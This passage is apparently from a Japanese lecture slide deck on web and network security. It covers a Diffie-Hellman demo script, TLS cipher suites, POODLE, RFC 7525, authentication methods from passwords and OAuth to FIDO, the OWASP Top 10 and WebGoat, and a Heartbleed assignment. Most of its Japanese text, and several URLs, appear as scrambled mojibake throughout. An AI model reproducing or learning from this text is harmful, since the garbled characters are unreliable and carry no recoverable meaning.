    Bob͔ΒAliceʹૹΔ஋: 123319
    Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243
    Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243
    7243ͱ͍͏஋Λڞ༗Ͱ͖ͨ
    ͜ͷ஋Λ΋ͱʹͯ͠ڞ௨伴҉߸ͷ伴Λ࡞Δ͜ͱ͕Ͱ͖Δ

    View Slide

  174. Diffie-Hellman Ephemeral
    Ұ࣌త
    #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    import random
    random.seed()
    # pͱx͸ࣄલʹ௨৴૬खͱڞ༗͓ͯ͘͠ = ౪ௌऀʹݟ͑Δ
    p=152219 # ೚ҙͷૉ਺
    x=2 # 2Ҏ্pະຬͷ೚ҙͷࣗવ਺
    # ͜ͷ஋͸௨৴ʹ৐ͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍
    secret1=random.randint(2,p)
    secret2=random.randint(2,p)
    print( u'Alice͕࡞ͬͨൿີͷ஋: %d' % secret1 )
    print( u'Bob͕࡞ͬͨൿີͷ஋: %d' % secret2 )
    # ͜ͷ஋͸௨৴Ͱ૬खʹ౉͢ = ౪ௌऀʹݟ͑Δ
    public1=pow( x, secret1, p )
    public2=pow( x, secret2, p )
    print( u'Alice͔ΒBobʹૹΔ஋: %d' % public1 )
    print( u'Bob͔ΒAliceʹૹΔ஋: %d' % public2 )
    # ͜ͷ஋͕Ұக͢Δ
    key1=pow( public2, secret1, p )
    ͜ͷ஋Λ伴ڞ༗Λߦ͏౓ʹ
    มߋ͢Δ
    ͜ͷ஋͕ແ͍ͱ伴Λ
    ಛఆͰ͖ͳ͍͕
    ͜ͷ஋ࣗମ͸౪ௌͰ͖ͳ͍ͨΊ
    ϑΥϫʔυηΩϡϦςΟ͕ಘΒΕΔ
    ൿີͷ஋͕ຖճมΘΔͷͰ૬ख͕ຊ෺͔Ͳ͏͔ͷ֬ೝ͕Ͱ͖ͳ͘ͳΔ
    ૬ख͕ຊ෺Ͱ͋Δ͜ͱͷ֬ೝ͸RSAΛ࢖ͬͯߦ͏

    View Slide

  175. DHE-RSA-AES256-SHA256
    TLS͕Diffie-Hellman伴ڞ༗Λ࢖͍ͬͯΔ͔Ͳ͏͔
    TLSͷ҉߸εΠʔτ໊ΛݟΕ͹Θ͔Δ
    ڞ௨伴ͷڞ༗ʹ
    Diffie-Hellman Ephemeral
    Λ࢖͏
    ௨৴૬ख͕ຊ෺Ͱ͋ΔࣄΛ
    RSAͰ͔֬ΊΔ
    256bitͷAESΛ࢖ͬͯσʔλΛ҉߸Խ͢Δ
    σʔλͷվ͟ΜΛݕग़͢ΔͨΊʹڞ௨伴ͱσʔλͷ
    SHA-256ϋογϡΛ࢖͏

    View Slide

  176. ପԁ཭ࢄର਺໰୊
    ཭ࢄର਺໰୊͸
    ର਺࣌ؒͰܭࢉͨ݁͠Ռ͔Βٯࢉ͢Δͷʹ
    ࢦ਺࣌ؒΛཁ͢Δ໰୊Ͱ͋Δ
    ٯࢉͰ͖ͳ͍Θ͚Ͱ͸ͳ͍ͷͰ
    े෼େ͖ͳ஋Λ࢖ͬͯٯࢉʹ͕͔͔࣌ؒΔΑ͏ʹ͢Δඞཁ͕͋Δ
    ପԁ཭ࢄର਺໰୊͸
    ର਺࣌ؒͰܭࢉͨ݁͠Ռ͔Βٯࢉ͢Δํ๏͕஌ΒΕ͍ͯͳ͍
    ٯࢉ͢Δํ๏͕ൃݟ͞Εͳ͍ݶΓ͸
    ૯౰ͨΓ߈ܸʹ଱͑ΒΕΔఔ౓ͷେ͖͞ͷ஋Ͱྑ͍

    View Slide

  177. ପԁۂઢDiffie-Hellman伴ڞ༗
    ཭ࢄର਺໰୊ͷ୅ΘΓʹପԁ཭ࢄର਺໰୊Λ࢖͏
    Diffie-Hellman伴ڞ༗
    TLSʹ͓͍ͯ͸
    Elliptic Curve Diffie-Hellman Ephemeral
    ུͯ͠ECDHEͱදه͞ΕΔ
    ݱ࣌఺Ͱ౪ௌऀʹݱ࣮తͳ࣌ؒͰ伴Λ஌ΒΕͳ͍ͨΊʹ
    RFC7525Ͱਪ঑͞Ε͍ͯΔ஋ͷେ͖͞
    %J⒏F)FMMNBO伴ڞ༗ ପԁۂઢ%J⒏F)FMMNBO伴ڞ༗
    CJU CJU
    https://tools.ietf.org/html/rfc7525

    View Slide

  178. ͜͜·Ͱͷ࿩͕Α͘෼͔Βͳ͔ͬͨਓʹ΋
    ͓͍֮͑ͯͯཉ͍͠ࣄ
    ౪ௌऀʹ৘ใ͕࿙Εͳ͍Α͏ʹਖ਼͘͠҉߸Λ࢖͏ͷ͸೉͍͠
    ಛผͳཧ༝͕ͳ͍ݶΓTLSΛ࢖͓͏

    View Slide

  179. TLS͸ྺ࢙͋ΔϓϩτίϧͳͷͰ
    ࠓ೔Ͱ͸҆શͱݴ͑ͳ͍҉߸ٕज़ʹ΋ରԠ͍ͯ͠Δ
    TLS͸઀ଓ࣌ʹαʔόͱΫϥΠΞϯτ͕࢖͑Δ҉߸ٕज़Λௐ΂ͯ
    ྆ऀ͕ରԠ͍ͯ͠Δ҉߸ٕज़Ͱ௨৴ΛࢼΈΔ
    ྫ͑͹ࠓ೔Ͱ͸ݱ࣮తͳ࣌ؒͰղಡͰ͖Δ512bitͷRSA΍RC4ʹ΋ରԠ͍ͯ͠Δ
    SSL 2.0 SSL 3.0 TLS 1.0 TLS 1.1 TLS 1.2 TLS 1.3
    com
    ing
    soon
    1994೥ 1996೥ 1999೥ 2006೥ 2008೥

    View Slide

  180. ಡΊΔ
    SSL 2.0 SSL 3.0 TLS 1.0 TLS 1.1 TLS 1.2 TLS 1.3
    com
    ing
    soon
    1994೥ 1996೥ 1999೥ 2006೥ 2008೥
    2010೥୅ʹೖͬͯݹ͍҉߸Λબ͹ͤͯ
    ݹ͍҉߸ͷऑ఺Λಥ͍ͯ౪ௌΛߦ͏੬ऑੑ͕ग़͖ͯͨ
    ΠϚυΩͷ҉߸OK ΠϚυΩͷ҉߸ແཧ
    ΠϚυΩͷ҉߸OK
    ΠϚυΩͷ҉߸ແཧ
    ऑ͍҉߸ ऑ͍҉߸
    Alice Bob
    ౪ௌऀ

    View Slide

  181. POODLE(CVE-2014-3566)
    https://nvd.nist.gov/vuln/detail/CVE-2014-3566
    2010೥୅ʹೖͬͯݹ͍҉߸Λબ͹ͤͯ
    SSL 3.0ͷن্֨ͷऑ఺Λಥ͍ͯ౪ௌΛߦ͏੬ऑੑ͕ग़͖ͯͨ
    ͜͜ʹ
    /*45ʹΑΔ100%-&ͷղઆΛషΔ

    View Slide

  182. SSL 2.0 SSL 3.0 TLS 1.0 TLS 1.1 TLS 1.2 TLS 1.3
    com
    ing
    soon
    1994೥ 1996೥ 1999೥ 2006೥ 2008೥
    TLS 1.3Ͱ͸ࠓͰ͸҆શͰͳ͍҉߸ٕज़͕࠷ॳ͔Β࢖༻ෆೳʹͳΔ
    TLS1.3͕ҰൠతʹͳΔ·Ͱ͸
    TLS 1.2͕࣋ͭػೳͷ͏ͪ
    ةݥͱ͞Ε͍ͯΔػೳΛ੾ͬͨঢ়ଶͰӡ༻
    SSL 3.0ͷΑ͏ͳຊ౰ʹݹ͍҉߸͔͠ରԠ͍ͯ͠ͳ͍௨৴૬ख͸
    ௨৴ΛఘΊͯ΋Β͏͔͠ͳ͍

    View Slide

  183. RFC7525
    Recommendations for Secure Use of Transport Layer Security (TLS)
    and Datagram Transport Layer Security (DTLS)
    TLS 1.2ͷػೳͷ͏ͪ
    ԿΛ੾͓ͬͯ͘΂͖͔͕
    ·ͱΊΒΕ͍ͯΔ
    IUUQTUPPMTJFUGPSHIUNMSGD
    ඇެࣜͳ೔ຊޠ༁IUUQTTVNNFSXJOEKQEPDTSGD
    ͜͜ʹ
    3'$ͷ"CTUSBDUΛషΔ

    View Slide

  184. ͜͜·Ͱͷ࿩͕Α͘෼͔Βͳ͔ͬͨਓʹ΋
    ͓͍֮͑ͯͯཉ͍͠ࣄ
    ౪ௌऀʹ৘ใ͕࿙Εͳ͍Α͏ʹਖ਼͘͠҉߸Λ࢖͏ͷ͸೉͍͠
    ಛผͳཧ༝͕ͳ͍ݶΓTLSΛ࢖͓͏
    TLSΛ࢖͏࣌͸
    ࠓͰ͸҆શͰ͸ͳ͍ݹ͍ػೳΛ੾Ζ͏
    NEW!

    View Slide

  185. ຊ෺ͷϢʔβͱ
    ِ෺ͷϢʔβΛݟ෼͚Δ

    View Slide

  186. ೝূ
    Alice
    Aliceͷ;ΓΛ͢Δ
    ѱҙ͋Δୈࡾऀ
    "MJDFͰ͢
    "MJDFͰ͢
    αʔό͕ຊ෺͔Ͳ͏͔Λ͔֬ΊΔ࣌ͱҧ͍
    Ϣʔβ͸ূ໌ॻΛ͍࣋ͬͯͳ͍

    View Slide

  187. ύεϫʔυೝূ
    ύεϫʔυ͸
    Ͱ͢
    ݹ͔͘Βར༻͞Ε͍ͯΔϢʔβͷೝূํ๏
    ຊ෺ͷ"MJDFͳΒ
    ύεϫʔυΛ஌͍ͬͯΔഺ
    ʜ
    Alice
    Aliceͷ;ΓΛ͢Δ
    ѱҙ͋Δୈࡾऀ

    View Slide

  188. ύεϫʔυೝূͷ໰୊఺
    ʜ๨Ε·ͨ͠
    ͍ΖΜͳαʔϏεʹ͍ΖΜͳύεϫʔυΛઃఆ͍ͯͨ͠Β
    Ϣʔβ͸ύεϫʔυΛ๨ΕΔ
    ຊ෺ͷ"MJDFͳΒ
    ύεϫʔυΛ஌͍ͬͯΔഺ
    ʜ
    Alice
    Aliceͷ;ΓΛ͢Δ
    ѱҙ͋Δୈࡾऀ

    View Slide

  189. ൿີͷ࣭໰
    ͜ΕͰ͸ύεϫʔυΛΑΓ؆୯ʹ͍ͯ͠ΔΑ͏ͳ΋ͷͰ͋Δ
    ޷͖ͳ৯΂෺͸
    ͳΜͰ͔͢
    Alice
    Aliceͷ;ΓΛ͢Δ
    ѱҙ͋Δୈࡾऀ
    ਖ਼ղ
    ύεϫʔυΛઃఆ͠௚͍ͯͩ͘͠͞

    View Slide

  190. OAuthೝূ
    ଟ͘ͷϢʔβ͸
    Googleɺfacebook౳ͷ
    ΞΧ΢ϯτΛ͍࣋ͬͯΔ
    αʔϏε͸
    ࣗ෼͕ͲΜͳ৘ใΛ
    ඞཁͱ͍ͯ͠Δ͔Λొ࿥͢Δ
    Ϣʔβ͸ͨ͘͞ΜͷαʔϏεΛར༻͍ͯ͠Δ
    ͦΕΒʹݸผʹύεϫʔυΛઃఆ͍ͯͨ͠Β
    ύεϫʔυΛ๨Εͯ͠·͏ͷ͸౰વͰ͋Δ

    View Slide

  191. OAuthೝূ
    ͋ͷαʔϏε
    ͋ͷαʔϏεʹ
    ϩάΠϯ͍ͨ͠
    ͋ͷαʔϏεʹ
    ͜Ε͚ͩͷ৘ใΛ౉͚͢ͲOK?
    OK
    ͋ͷαʔϏεʹ
    ϦΫΤεττʔΫϯ***Λ
    ౉͍ͯͩ͘͠͞

    View Slide

  192. OAuthೝূ
    ͋ͷαʔϏε
    ϦΫΤεττʔΫϯ***
    Ͱ͢
    ϦΫΤεττʔΫϯ***
    ͱ͔͍͏ͷ͕དྷͨΜ͚ͩͲ
    ͦͷਓ͸͏ͪͷAlice͞ΜͳͷͰ
    ௨͍ͯ͋͛ͯͩ͘͠͞
    Alice͞ΜͷৄࡉΛ஌Γ͍ͨ৔߹͸
    ΞΫηετʔΫϯ???Λ࢖͍ͬͯͩ͘͞

    View Slide

  193. ͜͜ʹ
    χίχίಈըͷ
    ϩάΠϯը໘ΛషΔ
    Ϣʔβ͸ීஈ࢖͍ͬͯΔSNS౳ʹ
    ϩάΠϯ͢Ε͹αʔϏεΛར༻Ͱ͖Δ
    αʔϏεຖʹ
    ύεϫʔυΛ֮͑Δඞཁ΋
    αʔϏεຖʹύεϫʔυΛೖྗ͢Δඞཁ΋ͳ͍
    αʔϏεఏڙऀ͸
    ۩ମతͳϢʔβೝূΛ
    ΑͦͷαʔϏεʹؙ౤͛Ͱ͖Δ
    ͜͏͍͏ͷ
    OAuthೝূ
    OAuthೝূΛ׆༻͍ͯ͠ΔαʔϏεͷྫ χίχίಈը
    https://account.nicovideo.jp/login

    View Slide

  194. 2ཁૉೝূ
    Ϣʔβ͕ຊ෺Ͱ͋Δ͜ͱΛ֬ೝ͢Δखஈ͸3ͭʹ෼ྨͰ͖Δ
    1.Ϣʔβ͸ԿΛ஌͍ͬͯΔ͔
    ύεϫʔυೝূ౳
    2.Ϣʔβ͸ԿͰ͋Δ͔
    ࢦ໲ೝূ౳
    3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔
    ਎෼ূͷఏࣔ౳
    1Ҏ֎͸ಛผͳ૷ஔΛཁ͢Δҝ
    ैདྷଟ͘ͷΠϯλʔωοτ্ͷαʔϏε͸1͚ͩΛ࢖͖ͬͯͨ

    View Slide

  195. ϑΟογϯά
    ຊ෺ͷαʔϏε
    ِ෺ͷαʔϏε
    ύεϫʔυ͸
    Ͱ͢
    ύεϫʔυ͸
    Ͱ͢
    ύεϫʔυ͸
    Ͱ͢
    Ϣʔβ͕ԿΛ஌͍ͬͯΔ͔͸
    ϑΟογϯάʹର͢Δ଱ੑ͕ͳ͍

    View Slide

  196. 2ཁૉೝূ
    Ϣʔβ͕ຊ෺Ͱ͋Δ͜ͱΛ֬ೝ͢Δखஈ͸3ͭʹ෼ྨͰ͖Δ
    1.Ϣʔβ͸ԿΛ஌͍ͬͯΔ͔
    ύεϫʔυೝূ౳
    2.Ϣʔβ͸ԿͰ͋Δ͔
    ࢦ໲ೝূ౳
    3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔
    ਎෼ূͷఏࣔ౳
    2ͱ3ͷ͍ͣΕ͔Λซ༻ͯ͠ͳΓ͢·͠Λ๷͙ඞཁ͕͋Δ

    View Slide

  197. SMSΛར༻ͨ͠2ཁૉೝূ
    3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔
    Ϣʔβ͸ొ࿥͞Ε͍ͯΔܞଳి࿩Λ͍࣋ͬͯΔ͔
    ύεϫʔυ͸
    Ͱ͢
    4.4ʹૹͬͨ൪߸Λ
    ೖྗ͍ͯͩ͘͠͞


    ϩάΠϯ੒ޭ

    View Slide

  198. SMSΛར༻ͨ͠2ཁૉೝূͷ໰୊఺
    ύεϫʔυ͸
    Ͱ͢

    ѱҙ͋Δୈࡾऀ͕SMSΛ೷͖ݟͰ͖ͨΒ
    ೝূΛಥഁ͞ΕΔ
    ͦ΋ͦ΋൪߸ೖྗ͢Δͷ
    ΊΜͲ͍͘͞
    ΋ͬͱ҆શ͔ͭखܰʹ
    2ཁૉೝূ͢ΔͨΊͷಓ۩͸
    ࡞Εͳ͍ͩΖ͏͔

    View Slide

  199. FIDO U2F
    https://www.yubico.com/products/yubikey-hardware/
    Ϣʔβ͕͔֬ʹ͜ͷUSBσόΠεΛ͍࣋ͬͯΔࣄΛ
    ެ։伴҉߸Λ࢖ͬͯূ໌͢Δ૷ஔ
    ͜͜ʹ
    ࣮ࡍʹചΒΕ͍ͯΔ'*%06'ͷσόΠεͷը૾ΛషΔ

    View Slide

  200. FIDO U2FͰϢʔβొ࿥
    Ϣʔβొ࿥
    AppIDΛఴ͑ͯ伴ੜ੒Λཁٻ
    "QQ*%ʹରԠ͢Δ
    ൿີ伴ͱެ։伴Λ࡞Δ
    ެ։伴ͱೝূثূ໌ॻͱ
    ೝূثূ໌ॻͰ࡞ͬͨॺ໊Λฦ͢
    ॺ໊Λ࢖ͬͯ
    ৴པͰ͖ΔೝূثͰ͋ΔࣄΛ֬ೝ
    ެ։伴Λอଘ
    ొ࿥׬ྃ

    View Slide

  201. FIDO U2FͰϩάΠϯ
    ύεϫʔυೝূ
    "QQ*%ʹରԠ͢Δ
    ൿີ伴ͰDIBMMFOHFΛ҉߸Խ
    ҉߸Խͨ͠challengeΛฦ͢
    อଘͯ͋͠Δެ։伴Ͱ
    DIBMMFOHFΛ෮߸Ͱ͖ΔࣄΛ֬ೝ
    ೝূ׬ྃ
    ύεϫʔυΛ֬ೝ
    AppIDͱchallengeΛૹ৴

    View Slide

  202. FIDO UAF
    ͦ΋ͦ΋ύεϫʔυΛೖྗ͢Δͷ͕ΊΜͲ͍͘͞
    1.Ϣʔβ͸ԿΛ஌͍ͬͯΔ͔
    ύεϫʔυೝূ౳
    2.Ϣʔβ͸ԿͰ͋Δ͔
    ࢦ໲ೝূ౳
    3.Ϣʔβ͸ԿΛ͍࣋ͬͯΔ͔
    ਎෼ূͷఏࣔ౳
    1Λ࢖Θͣʹ2ͱ3Ͱ2ཁૉೝূ͠Α͏

    View Slide

  203. FIDO UAF
    ੜମೝূ͕ඞཁʹͳΔͨΊෳࡶͳϋʔυ΢ΣΞ͕ඞཁʹͳΔ͕
    Xperia XZ1͕FIDO UAF 1.1ʹ४ڌͨ͠ॳͷσόΠεʹͳͬͨࣄΛใ͡Δهࣄ
    https://fidoalliance.org/first-fido-uaf-1-1-implementations-ease-deployment-
    advanced-biometric-authentication-android-devices/
    αʔϏε͕FIDO UAFʹରԠ͢Δ͜ͱͰ
    ͜͏ͨ͠σόΠεͷϢʔβʹύεϫʔυෆཁͷೝূΛఏڙͰ͖Δ
    ͜͜ʹ
    9QFSJB9;͕'*%06"'ʹ४ڌͨ͜͠ͱΛใ͡ΔهࣄΛషΔ

    View Slide

  204. Webϖʔδʹର͢Δ
    ߈ܸʹඋ͑Δ

    View Slide

  205. OWASP
    https://www.owasp.org/
    ҆શͳWebΞϓϦέʔγϣϯͷҝͷ৘ใͷڞ༗΍ܒൃΛߦ͏
    ΦʔϓϯίϛϡχςΟ
    ͜͜ʹ
    08"41ͷτοϓϖʔδΛషΔ

    View Slide

  206. OWASP Top 10
    WebΞϓϦέʔγϣϯ։ൃऀ΁ͷ஫ҙשىΛ໨తͱͯ͠
    WebΞϓϦέʔγϣϯͷ୅දతͳ੬ऑੑΛ10छྨબΜͩ΋ͷ
    https://www.owasp.org/images/2/23/OWASP_Top_10-2017%28ja%29.pdf
    ࠷৽൛͸OWASP Top 10 2017Ͱ೔ຊޠ༁΋ଘࡏ͢Δ
    ͜͜ʹ
    08"415PQͷදࢴΛషΔ

    View Slide

  207. OWASP Top 10
    ΠϯδΣΫγϣϯ
    ೝূͷෆඋ
    ػඍͳ৘ใͷ࿐ग़
    9.-֎෦ΤϯςΟςΟࢀর
    ΞΫηε੍ޚͷෆඋ
    ෆద੾ͳηΩϡϦςΟઃఆ
    ΫϩεαΠτεΫϦϓςΟϯά
    ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ
    ط஌ͷ੬ऑੑͷ͋Δίϯϙʔωϯτͷ࢖༻
    ෆे෼ͳϩΪϯάͱϞχλϦϯά

    View Slide

  208. ͜͜ʹ
    08"415PQͷΠϯδΣΫγϣϯͷղઆΛషΔ
    OWASP Top 10
    https://www.owasp.org/images/2/23/
    OWASP_Top_10-2017%28ja%29.pdf
    ੬ऑੑͷछྨຖʹ
    ͲͷΑ͏ʹൃݟ͢Ε͹ྑ͍͔
    ͲͷΑ͏ʹ๷ࢭ͢Ε͹ྑ͍͔
    ͕వΊΒΕ͍ͯΔ
    ΠϯδΣΫγϣϯʹର͢Δ๷ࢭํ๏
    ΠϯλϓϦλ͔ΒΫΤϦΛ౤͛ͳ͍
    ύϥϝʔλԽ͞ΕͨΠϯλʔϑΣʔε
    ·ͨ͸ORMΛ࢖͏
    ಡ΋͏

    View Slide

  209. ͜͜ʹ
    08"41"474ͷදࢴΛషΔ
    OWASP Application Security Verification Standard
    WebΞϓϦέʔγϣϯͷ҆શੑΛݕূ͢ΔͨΊʹ
    νΣοΫ͢΂͖߲໨Λ·ͱΊͨ΋ͷ
    ࠷৽൛͸OWASP ASVS 3.0.1Ͱ೔ຊޠ༁΋ଘࡏ͢Δ
    IUUQTXXXKQDFSUPSKQTFDVSFDPEJOHNBUFSJBMTPXBTQBTWTIUNM

    View Slide

  210. ͜͜ʹ
    08"41"474ͷνΣοΫ߲໨ͷҰ෦ΛషΔ
    OWASP Application Security Verification Standard
    IUUQTXXXKQDFSUPSKQTFDVSFDPEJOH
    NBUFSJBMTPXBTQBTWTIUNM
    ͋ΒΏΔΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ1
    ݸਓ৘ใ΍վ͟Μ͞ΕΔͱࠔΔ৘ใΛѻ͏
    ΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ2
    ো֐ͷൃੜ͕૊৫ͷଘଓ΍ਓ໋ʹؔΘΔ
    ΞϓϦέʔγϣϯ͕ຬͨ͢΂͖Ϩϕϧ3
    Ϩϕϧ্͕͕Δ΄ͲνΣοΫ߲໨͕૿͑Δ
    ύεϫʔυมߋػೳʹ
    ݹ͍ύεϫʔυͷೖྗ
    ৽͍͠ύεϫʔυͷೖྗ
    ৽͍͠ύεϫʔυͷ֬ೝ
    ͷ3ͭΛཁٻ͍ͯ͠Δ͔Ͳ͏͔ΛνΣοΫ
    WebΞϓϦέʔγϣϯΛ࡞ͬͨΒ
    νΣοΫ͠Α͏

    View Slide

  211. ͜͜ʹ
    08"418FC(PBUͷը૾ΛషΔ
    OWASP WebGoat
    https://github.com/WebGoat/WebGoat
    JavaͰॻ͔ΕͨWebΞϓϦέʔγϣϯ
    ҙਤతʹ༷ʑͳ੬ऑੑ͕࢓ࠐ·Ε͍ͯΔ
    ੬ऑੑΛ࣮ફతʹֶͼ͍ͨ
    ࣗ෼ͷߦͳ͍ͬͯΔ੬ऑੑͷνΣοΫ͕
    ਖ਼͍͔͔֬͠Ί͍ͨ
    ͦ͏͍͏࣌ʹ࢖͑Δ

    View Slide

  212. ࠷ޙʹ

    View Slide

  213. ͋ΒΏΔιϑτ΢ΣΞηΩϡϦςΟ͸
    ෺ཧతͳηΩϡϦςΟΛલఏͱ͍ͯ͠Δ
    ѱҙ͋Δୈࡾऀ͕αʔόϧʔϜʹ৵ೖͯ͠ిݯέʔϒϧΛൈ͘͜ͱͰ
    αʔϏεΛఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ੬ऑੑ
    ·ͣށకΓ
    ιϑτ΢ΣΞηΩϡϦςΟ͸ͦΕ͔Βͩ
    ͜ͷΑ͏ͳ߈ܸʹରͯ͠ιϑτ΢ΣΞ͸جຊతʹଧͭख͕ͳ͍

    View Slide

  214. ՝୊
    CVE-2014-0160
    ͜ͷ੬ऑੑ͕Ͳ͏͍͏࣌ʹԿ͕ى͜Δ΋ͷͰ
    ͦͷ݁ՌͲͷΑ͏ͳѱӨڹ͕༧૝͞ΕΔ͔Λઆ໌͍ͯͩ͘͠͞
    ͜ͷ੬ऑੑΛճආ͢ΔͨΊʹͱΓ͏ΔରԠΛ1ͭҎ্ड़΂͍ͯͩ͘͞

    View Slide